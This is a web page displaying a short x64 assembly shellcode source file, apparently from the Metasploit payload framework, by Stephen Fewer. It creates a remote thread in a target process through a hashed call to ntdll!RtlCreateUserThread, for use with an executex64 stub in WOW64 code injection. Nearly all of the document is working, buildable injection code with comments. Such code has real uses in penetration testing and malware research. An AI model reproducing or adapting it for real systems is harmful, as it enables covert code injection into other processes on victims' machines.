Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
;-----------------------------------------------------------------------------;
2
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
3
; Compatible: Windows 7, 2008R2, 2008, 2003, XP
4
; Architecture: x64
5
; Version: 1.0 (Jan 2010)
6
; Size: 296 bytes
7
; Build: >build.py remotethread
8
;-----------------------------------------------------------------------------;
9

10
; Function to create a remote thread via ntdll!RtlCreateUserThread, used with the x86 executex64 stub.
11

12
; This function is in the form (where the param is a pointer to a WOW64CONTEXT):
13
;     typedef BOOL (WINAPI * X64FUNCTION)( DWORD dwParameter );
14

15
;typedef struct _WOW64CONTEXT
16
;{
17
;  union
18
;  {
19
;    HANDLE hProcess;
20
;    BYTE bPadding2[8];
21
;  } h;
22
;  union
23
;  {
24
;    LPVOID lpStartAddress;
25
;    BYTE bPadding1[8]; 
26
;  } s;
27
;  union
28
;  {
29
;    LPVOID lpParameter;
30
;    BYTE bPadding2[8];
31
;  } p;
32
;  union
33
;  {
34
;    HANDLE hThread;
35
;    BYTE bPadding2[8];
36
;  } t;
37
;} WOW64CONTEXT, * LPWOW64CONTEXT;
38

39
[BITS 64]
40
[ORG 0]
41
  cld                    ; Clear the direction flag.
42
  mov rsi, rcx           ; RCX is a pointer to our WOW64CONTEXT parameter
43
  mov rdi, rsp           ; save RSP to RDI so we can restore it later, we do this as we are going to force alignment below...
44
  and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned (as we originate from a wow64 (x86) process we cant guarantee alignment)
45
  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
46
delta:                   ;
47
%include "./src/block/block_api.asm"
48
start:                   ;
49
  pop rbp                ; Pop off the address of 'api_call' for calling later.
50
  ; setup the parameters for RtlCreateUserThread...
51
  xor r9, r9             ; StackZeroBits = 0
52
  push r9                ; ClientID = NULL
53
  lea rax, [rsi+24]      ; RAX is now a pointer to ctx->t.hThread
54
  push rax               ; ThreadHandle = &ctx->t.hThread
55
  push qword [rsi+16]    ; StartParameter = ctx->p.lpParameter
56
  push qword [rsi+8]     ; StartAddress = ctx->s.lpStartAddress
57
  push r9                ; StackCommit = NULL
58
  push r9                ; StackReserved = NULL
59
  mov r8, 1              ; CreateSuspended = TRUE
60
  xor rdx, rdx           ; SecurityDescriptor = NULL
61
  mov rcx, [rsi]         ; ProcessHandle = ctx->h.hProcess
62
  ; perform the call to RtlCreateUserThread...
63
  mov r10d, 0x40A438C8   ; hash( "ntdll.dll", "RtlCreateUserThread" ) 
64
  call rbp               ; RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL )
65
  test rax, rax          ; check the NTSTATUS return value
66
  jz success             ; if its zero we have successfully created the thread so we should return TRUE
67
  mov rax, 0             ; otherwise we should return FALSE
68
  jmp cleanup            ;
69
success:
70
  mov rax, 1             ; return TRUE
71
cleanup:
72
  add rsp, (32 + (8*6))  ; fix up stack (32 bytes for the single call to api_call, and 6*8 bytes for the six params we pushed).
73
  mov rsp, rdi           ; restore the stack
74
  ret                    ; and return to caller
75

76